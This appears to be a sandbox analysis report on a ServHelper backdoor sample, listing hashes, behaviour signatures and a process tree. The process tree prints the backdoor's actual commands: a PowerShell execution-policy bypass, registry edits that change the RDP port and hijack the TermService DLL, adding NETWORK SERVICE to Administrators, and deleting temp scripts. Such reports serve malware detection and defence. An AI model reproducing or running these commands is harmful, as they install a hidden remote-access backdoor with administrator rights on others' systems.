Analysis
-
max time kernel
95s -
max time network
120s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
10-10-2021 11:58
Static task
static1
Behavioral task
behavioral1
Sample
cb3cc551561883ab8fc4fb6fc837a469.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
cb3cc551561883ab8fc4fb6fc837a469.exe
Resource
win10-en-20210920
General
-
Target
cb3cc551561883ab8fc4fb6fc837a469.exe
-
Size
4.0MB
-
MD5
cb3cc551561883ab8fc4fb6fc837a469
-
SHA1
f74ae6d243342099d3fa500cbc630f4a244a8d82
-
SHA256
ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
-
SHA512
b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe 3424 powershell.exe 3424 powershell.exe 3424 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 640 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
cb3cc551561883ab8fc4fb6fc837a469.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid Process procid_target PID 2524 wrote to memory of 1572 2524 cb3cc551561883ab8fc4fb6fc837a469.exe 72 PID 2524 wrote to memory of 1572 2524 cb3cc551561883ab8fc4fb6fc837a469.exe 72 PID 2524 wrote to memory of 1572 2524 cb3cc551561883ab8fc4fb6fc837a469.exe 72 PID 1572 wrote to memory of 1072 1572 powershell.exe 74 PID 1572 wrote to memory of 1072 1572 powershell.exe 74 PID 1572 wrote to memory of 1072 1572 powershell.exe 74 PID 1072 wrote to memory of 1144 1072 csc.exe 75 PID 1072 wrote to memory of 1144 1072 csc.exe 75 PID 1072 wrote to memory of 1144 1072 csc.exe 75 PID 1572 wrote to memory of 3424 1572 powershell.exe 76 PID 1572 wrote to memory of 3424 1572 powershell.exe 76 PID 1572 wrote to memory of 3424 1572 powershell.exe 76 PID 1572 wrote to memory of 1600 1572 powershell.exe 78 PID 1572 wrote to memory of 1600 1572 powershell.exe 78 PID 1572 wrote to memory of 1600 1572 powershell.exe 78 PID 1572 wrote to memory of 4052 1572 powershell.exe 80 PID 1572 wrote to memory of 4052 1572 powershell.exe 80 PID 1572 wrote to memory of 4052 1572 powershell.exe 80 PID 1572 wrote to memory of 1548 1572 powershell.exe 82 PID 1572 wrote to memory of 1548 1572 powershell.exe 82 PID 1572 wrote to memory of 1548 1572 powershell.exe 82 PID 1572 wrote to memory of 3632 1572 powershell.exe 83 PID 1572 wrote to memory of 3632 1572 powershell.exe 83 PID 1572 wrote to memory of 3632 1572 powershell.exe 83 PID 1572 wrote to memory of 3200 1572 powershell.exe 84 PID 1572 wrote to memory of 3200 1572 powershell.exe 84 PID 1572 wrote to memory of 3200 1572 powershell.exe 84 PID 1572 wrote to memory of 408 1572 powershell.exe 85 PID 1572 wrote to memory of 408 1572 powershell.exe 85 PID 1572 wrote to memory of 408 1572 powershell.exe 85 PID 408 wrote to memory of 2488 408 net.exe 86 PID 408 wrote to memory of 2488 408 net.exe 86 PID 408 wrote to memory of 2488 408 net.exe 86 PID 1572 wrote to memory of 3312 1572 powershell.exe 87 PID 1572 wrote to memory of 3312 1572 powershell.exe 87 PID 1572 wrote to memory of 3312 1572 powershell.exe 87 PID 3312 wrote to memory of 2344 3312 cmd.exe 88 PID 3312 wrote to memory of 2344 3312 cmd.exe 88 PID 3312 wrote to memory of 2344 3312 cmd.exe 88 PID 2344 wrote to memory of 1756 2344 cmd.exe 89 PID 2344 wrote to memory of 1756 2344 cmd.exe 89 PID 2344 wrote to memory of 1756 2344 cmd.exe 89 PID 1756 wrote to memory of 2328 1756 net.exe 90 PID 1756 wrote to memory of 2328 1756 net.exe 90 PID 1756 wrote to memory of 2328 1756 net.exe 90 PID 1572 wrote to memory of 1744 1572 powershell.exe 91 PID 1572 wrote to memory of 1744 1572 powershell.exe 91 PID 1572 wrote to memory of 1744 1572 powershell.exe 91 PID 1744 wrote to memory of 2000 1744 cmd.exe 92 PID 1744 wrote to memory of 2000 1744 cmd.exe 92 PID 1744 wrote to memory of 2000 1744 cmd.exe 92 PID 2000 wrote to memory of 4020 2000 cmd.exe 93 PID 2000 wrote to memory of 4020 2000 cmd.exe 93 PID 2000 wrote to memory of 4020 2000 cmd.exe 93 PID 4020 wrote to memory of 1936 4020 net.exe 94 PID 4020 wrote to memory of 1936 4020 net.exe 94 PID 4020 wrote to memory of 1936 4020 net.exe 94 PID 1572 wrote to memory of 1840 1572 powershell.exe 96 PID 1572 wrote to memory of 1840 1572 powershell.exe 96 PID 1572 wrote to memory of 1840 1572 powershell.exe 96 PID 1572 wrote to memory of 2380 1572 powershell.exe 97 PID 1572 wrote to memory of 2380 1572 powershell.exe 97 PID 1572 wrote to memory of 2380 1572 powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v3nplro\5v3nplro.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5v3nplro\CSCB864D1E737C475DBB2095527C87833.TMP"4⤵PID:1144
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3200
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2328
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1840
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2380
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
acf1798c2d21b1ffacb9bf25aeaa4981
SHA130d499750db558d0c8a8dff3636028999ae1469e
SHA2568119436bd0e13c95adea910a80c284b0a23179db812e71fabf2271c5efdb1446
SHA512a37a61cccc24025e88f72032cc6d0922ad5fbeba221274de7ddf0fc7e184ff4e683eccb9af99b2614e9920cdeff94dd0d780425da6250e0ced0508f5ba63a706
-
MD5
3f59d8c6da5e528a387e0dc7c3462ebd
SHA12160e936a03a3e4d3e3d796bfedcaa56a6056673
SHA256414e3878cf6b2ed33b16272690bc4104af1bd931543f7dcf913d2121d7249912
SHA5120b8406182ee691af3867e862f650f6cc2be2ff04f9f298c28b541c4d6c6a5c7480c785dd82c510d7b3f336681d3d1b49a8666489d93954f6dff92bfe030cdc46
-
MD5
841cc93778b4ec353d0075d717b90df4
SHA1287f652b7be199d127aab4655055654a6ea2bed6
SHA25677f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1
SHA512a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
292905cdc8c1defa62d1b8f89a49c38c
SHA1f97c2427fbac0ad008cc2c7f5510c5db83dc768e
SHA2564c6f52ebd5cb111806c3a2ae0f35e850c6c42773042f632db9c5c98518881dc6
SHA512afc23bd7273f47b2053aabb1b89b50cb54cebd467ce901c9b736a4fc164228e854c6ccd227255e025709f9e7c09c9653e04c79ff3cf866739b2f13c245eb568e
-
MD5
5fd7d630ec70b241981394c5f84dbe87
SHA153b76710e2c8407b31fbe644a94ed8eeacd90d84
SHA256a9a4d888af53069e728b3ccc0e2a798ac523e86b0f0443ec4957ab3388ccf5de
SHA51290ec2357d2825f4b72e6a8b43003515d23342d9a022be4715b00a38cfeba1277b595dd3282abde733cbabf12c9867a7d06b44aef2cf7ea8a32268ffc75f18678